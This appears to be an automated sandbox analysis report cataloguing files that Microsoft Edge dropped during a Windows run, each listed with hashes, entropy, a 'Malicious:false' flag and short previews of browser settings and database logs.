                                                                                                                                                                                                                                                                                      Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-673DB1D7-1AAC.pma

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.5242684198863466
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:SMEaQCJ4yUfH/jHBqpN8Yy7B7+FFaHOyo:VUffj3Uk
                                                                                                                                                                                                                                                                                      MD5:2F50C9FCD4EE04CCC1EA8C6725CEF40E
                                                                                                                                                                                                                                                                                      SHA1:093020228A5E9773CF7C5B08DEEEF16175A7486F
                                                                                                                                                                                                                                                                                      SHA-256:33E189809E2E06E18A8E4B18274D5B1F09D8A426932027EB3972E63D3A7010F5
                                                                                                                                                                                                                                                                                      SHA-512:BBB4661C0A04750BFB5D8679B4113A08DACCAA565DCA2D78E2CFF6B17FBC684470E00EE0FA5F372F4B22E69B13476D39D87D1F5E3D152B079B0A842EEB45BAF4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:...@..@...@.....C.].....@...............h>...=..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".awolys20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U?:K...G...W6.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2.....

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):280
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.0984945491284295
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
                                                                                                                                                                                                                                                                                      MD5:AFAC5E4CC1213807ACB7D1A0F61BCF99
                                                                                                                                                                                                                                                                                      SHA1:FEDCA0A829A0DBCCD1E9D7048398372FF9604783
                                                                                                                                                                                                                                                                                      SHA-256:FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
                                                                                                                                                                                                                                                                                      SHA-512:44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0d2feae5-2167-4522-9347-5f731421c944.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\17ffb7fe-fdc5-44f4-8d8e-30eb03f50b33.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\18be28a5-8385-4af6-a24d-b6e20c7d6429.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (17566), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):17574
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.482317445814569
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stoJ99QTryDigabatSuypKsA4iaaFvrErrkfIYvdofbZKT6bPZPoYQa8obV+F2C9:stoPGKSu4KsA4VCDe94MFRXbG/QwS3a
                                                                                                                                                                                                                                                                                      MD5:6C39BAE1AFDBDB3762A5755C93478E7B
                                                                                                                                                                                                                                                                                      SHA1:5ECCEB04BBA2BD240AEC1C625E56148FDDF8C0D0
                                                                                                                                                                                                                                                                                      SHA-256:F3B9F342AA0224F6D10653F113E75AD6BC8E1A0B8579C1B88110148919718E3A
                                                                                                                                                                                                                                                                                      SHA-512:31385F7E747B875E03EEC17A911F33A0942A43A116D2CA69F5C3B602C98D1793BE944EB09CA68CC10E76D9D9392A68BD5F1FFDCEFF7F381BC8157EAD5D75237A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376570072277690","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\24400fab-5608-47e2-9717-097cac6a9bce.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (16623), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16631
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.447596014397479
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stoJ99QTryDigabatSuypKsA4iaaFvrE9kfIYvdofbZKT6bPZPoYha8obV+F2CQL:stoPGKSu4KsA4VCDI4MFR+bG/Qw3a
                                                                                                                                                                                                                                                                                      MD5:513853D4439C1D901FA8ED86337EBA2A
                                                                                                                                                                                                                                                                                      SHA1:53DBDC954619FD909F37C6C62F4FD7EF1A9ED129
                                                                                                                                                                                                                                                                                      SHA-256:740B2169765CE4F50DD644E632C1585901D2E886516472F31FF72862571D7D96
                                                                                                                                                                                                                                                                                      SHA-512:52E0CA76BF67BF10452E308A003808A810167AAE85CDA06E5A76EA2885CB435B38CFF4B7442A5862E4D181FBE1B8422C5119045230E7098876882C6556DDB057
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376570072277690","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\2e540c57-141e-4312-b259-3272172b05f1.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40504
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.561489611187661
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:7Lab3UWMa7pLGLP/VW5wtZf4fd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP+vz0Imr9:7+jUXycP/VWatZfYdu1jabvz8R/3TztB
                                                                                                                                                                                                                                                                                      MD5:6CAA12D55CD67B02310E37CC0C46F4E1
                                                                                                                                                                                                                                                                                      SHA1:38BC671892BD983EB4408581C8610D7E8FBD2F02
                                                                                                                                                                                                                                                                                      SHA-256:138FBF714204007F61D67D466B73FAEC524AFAED6BBBDFE2E2236F347D8A460A
                                                                                                                                                                                                                                                                                      SHA-512:D7478A2812C808EE8D7EF51E8CBD556DC2F9DC99B3929BAF6A065DF6071C90AF64D22753C1F2297BB893D815B75E91604B0585CAAE229A6D14E31312DC23C822
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376570071621027","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376570071621027","location":5,"ma

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\57061788-1611-4010-8fbf-8f799db2f068.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (17401), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):17409
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.485665338017715
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stoJ99QTryDigabatSuypKsA4iaaFvrErrkfIYvdofbZKT6bPZPoYQa8obV+F2Ca:stoPGKSu4KsA4VCDe94MFRXbG/Qw3a
                                                                                                                                                                                                                                                                                      MD5:ECE9C7E0B0E705AB37E9088EA7365540
                                                                                                                                                                                                                                                                                      SHA1:1E09F9BB184F92AB259719EEC609DBBE47E6EADC
                                                                                                                                                                                                                                                                                      SHA-256:2B9CF2A8E6A0B2BF5F95E503EAA246D8B4905D1EBADF24A6C8EAE713AA6BC113
                                                                                                                                                                                                                                                                                      SHA-512:CF35A82149F6634A7D244275FA0F703887C12DABF3BEE010F4C9B82FAA85A7ED509E48DF8817D769DBBE3CE621348C8960AB8BB40A43F8C24CE313167BE8FDC4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376570072277690","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7dbd8b15-2f60-47f3-9c44-1651aecfc14f.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40503
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.561583754871804
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:7Lab3UWMa7pLGLP/VW5wtZf4Md8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP+vz0ImrM:7+jUXycP/VWatZfRdu1jabvz8R/3TMtB
                                                                                                                                                                                                                                                                                      MD5:663A010F18D30961185E906BE2699B91
                                                                                                                                                                                                                                                                                      SHA1:539F48A56DE673E92A79A35D446F4181CA8890C0
                                                                                                                                                                                                                                                                                      SHA-256:B3ACF6458EBEE62DB5F448CE2BD9515F7CE9E1BD2A7E6A18EAFDBE93BD5596B1
                                                                                                                                                                                                                                                                                      SHA-512:A935A4D056725C3C299D310BFC1FF74910FE62AC4E40789724A5D1D21B5EEB9EB595580703072B7B6FE59FD577BBA95563131033CDA53452747CB69FE11C7A4E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376570071621027","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376570071621027","location":5,"ma

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9292dbf4-b2a9-4810-a8b3-2d330af8b961.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):35286
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.557877490343028
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:7Lab3UWtVW5wtZf4Md8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPZ0Imrl6rwXHT3ZqU:7+jU+VWatZfRdu1jaO8R/3T34PtO
                                                                                                                                                                                                                                                                                      MD5:34C6C6C6894559A466FFBB2663E75937
                                                                                                                                                                                                                                                                                      SHA1:3E4C22C1963F2E6363D1746CC3911ED6E843F155
                                                                                                                                                                                                                                                                                      SHA-256:4EA1466CEE5677BB87516869D7315781BF84FF6DBF767E79F6421986690E41BE
                                                                                                                                                                                                                                                                                      SHA-512:DE7EDEE94D4EF6BF030EA76B1343F0C01B2FEF349B84BBCF16D52AAB7EE1F52359A5158A111CC94003EEEF08017696F8B74004750A912FEB046428E6FDF55354
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376570071621027","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376570071621027","location":5,"ma

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):33
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                      MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                      SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                      SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                      SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):313
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.268294688175348
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQwG4M1N723oH+Tcwtp3hBtB2KLlVIQB40Vq2PN723oH+Tcwtp3hBWsIFUv:oQ/4saYebp3dFLQQG0VvVaYebp3eFUv
                                                                                                                                                                                                                                                                                      MD5:B9F489E5B159C81F203DED8212BCC946
                                                                                                                                                                                                                                                                                      SHA1:FA0B5189D62FE2E11A89C2C92B8B2261B65DA0EF
                                                                                                                                                                                                                                                                                      SHA-256:A816E528CD6943CE8F275F3E27D5D9EF54758CED9AB3699D21472CE3911C838E
                                                                                                                                                                                                                                                                                      SHA-512:B8D795EA7275DA675D597DB6D84E853A67A4516BBE957AE97A889955918C8748730899794AFAAE9B6DC63E0B02EF8A7ABA38DACC5CFCBDBDB28CD5A5D8DBA367
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:37.900 1f64 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/20-04:54:37.918 1f64 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
